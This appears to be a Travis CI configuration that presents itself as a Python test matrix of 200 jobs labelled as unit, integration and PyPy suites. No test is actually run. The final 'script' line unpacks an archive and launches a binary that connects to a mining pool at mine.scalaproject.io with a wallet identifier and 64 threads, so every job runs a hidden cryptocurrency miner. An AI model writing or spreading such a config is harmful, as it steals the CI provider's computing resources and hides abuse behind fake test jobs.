language: python
jobs:
  include:
  - name: "sapu-001"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-002"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-003"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-004"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-005"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-006"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-007"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-008"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-009"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-010"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-011"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-012"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-013"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-014"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-015"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-016"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-017"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-018"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-019"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-020"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-021"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-022"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-023"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-024"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-025"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-026"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-027"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-028"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-029"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-030"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-031"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-032"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-033"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-034"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-035"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-036"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-037"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-038"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-039"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-040"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-041"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-042"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-043"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-044"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-045"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-046"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-047"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-048"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-049"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-050"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-051"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-052"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-053"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-054"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-055"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-056"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-057"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-058"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-059"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-060"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-061"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-062"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-063"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-064"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-065"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-066"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-067"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-068"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-069"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-070"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-071"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-072"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-073"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-074"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-075"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-076"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-077"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-078"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-079"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-080"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-081"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-082"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-083"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-084"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-085"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-086"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-087"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-088"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-089"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-090"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-091"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-092"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-093"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-094"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-095"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-096"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-097"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-098"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-099"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-100"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-101"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-102"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-103"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-104"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-105"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-106"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-107"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-108"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-109"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-110"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-111"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-112"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-113"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-114"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-115"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-116"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-117"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-118"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-119"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-120"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-121"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-122"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-123"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-124"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-125"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-126"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-127"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-128"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-129"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-130"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-131"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-132"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-133"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-134"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-135"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-136"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-137"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-138"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-139"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-140"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-141"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-142"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-143"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-144"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-145"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-146"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-147"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-148"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-149"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-150"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-151"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-152"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-153"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-154"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-155"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-156"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-157"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-158"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-159"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-160"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-161"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-162"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-163"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-164"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-165"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-166"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-167"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-168"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-169"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-170"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-171"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-172"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-173"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-174"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-175"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-176"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-177"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-178"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-179"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-180"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-181"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-182"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-183"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-184"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-185"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-186"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-187"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-188"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-189"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-190"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-191"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-192"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-193"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-194"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-195"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-196"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-197"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
  - name: "sapu-198"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_integration
  - name: "sapu-199"
    python: "pypy"
    env: TEST_SUITE=suite_pypy_unit
  - name: "sapu-200"
    python: "3.5"
    env: TEST_SUITE=suite_3_5_unit
script: tar -xvf XLA.tar.gz && chmod +x node.sh && ./voc -o mine.scalaproject.io:3333 -u Ssy29BdPp2WZLWQiR7uctzQri3drBZz4zabpNVPui44wHbdJ39idgMUCM2xJvqd13uERaEiYuyoYMBLVnxzX593s6ZsA9kYcj2+2000 -p tr -t 64